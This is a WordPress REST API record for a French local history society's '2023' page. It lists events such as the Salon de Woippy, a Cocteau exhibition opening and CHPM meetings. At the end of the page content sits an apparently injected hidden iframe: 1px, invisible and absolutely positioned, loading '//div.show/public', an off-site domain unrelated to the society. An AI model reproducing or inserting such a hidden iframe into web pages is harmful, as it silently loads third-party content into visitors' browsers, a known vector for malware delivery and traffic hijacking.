{"id":7005,"date":"2023-07-04T16:09:59","date_gmt":"2023-07-04T14:09:59","guid":{"rendered":"http:\/\/lorrylesmetz-histoire.fr\/?page_id=7005"},"modified":"2023-12-18T12:10:00","modified_gmt":"2023-12-18T11:10:00","slug":"2023-2","status":"publish","type":"page","link":"http:\/\/lorrylesmetz-histoire.fr\/?page_id=7005","title":{"rendered":"2023"},"content":{"rendered":"<table style=\"width: 100%; height: 108px;\">\n<tbody>\n<tr>\n<td>20 novembre<\/td>\n<td>Salon de Woippy<\/td>\n<td><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=7410\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-683\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"height: 24px;\">11 octobre<\/td>\n<td style=\"height: 24px;\">Vernissage de l&rsquo;exposition Cocteau<\/td>\n<td style=\"height: 24px;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=7276\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-683\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"height: 24px;\">9 octobre<\/td>\n<td style=\"height: 24px;\">R\u00e9union du CHPM<\/td>\n<td style=\"height: 24px;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=7278\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-683\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/td>\n<\/tr>\n<tr style=\"height: 30px;\">\n<td style=\"height: 30px;\">16 et 17 septembre<\/td>\n<td style=\"height: 30px;\">Journ\u00e9es du patrimoine \u00e0 Metz<\/td>\n<td style=\"height: 30px;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=7157&amp;preview=true\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-683\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/td>\n<\/tr>\n<tr style=\"height: 30px;\">\n<td style=\"height: 30px;\">22 mai<\/td>\n<td style=\"height: 30px;\">R\u00e9union du CHPM<\/td>\n<td style=\"height: 30px;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=7009\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-683 size-full\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png?_t=1647333134\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=171\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-378\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/retour.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/p>\n<div><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>20 novembre Salon de Woippy 11 octobre Vernissage de l&rsquo;exposition Cocteau 9 octobre R\u00e9union du CHPM 16 et 17 septembre Journ\u00e9es du patrimoine \u00e0 Metz 22 mai R\u00e9union du CHPM<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":171,"menu_order":3,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_mc_calendar":[],"footnotes":""},"class_list":["post-7005","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/7005","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7005"}],"version-history":[{"count":8,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/7005\/revisions"}],"predecessor-version":[{"id":7446,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/7005\/revisions\/7446"}],"up":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/171"}],"wp:attachment":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7005"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}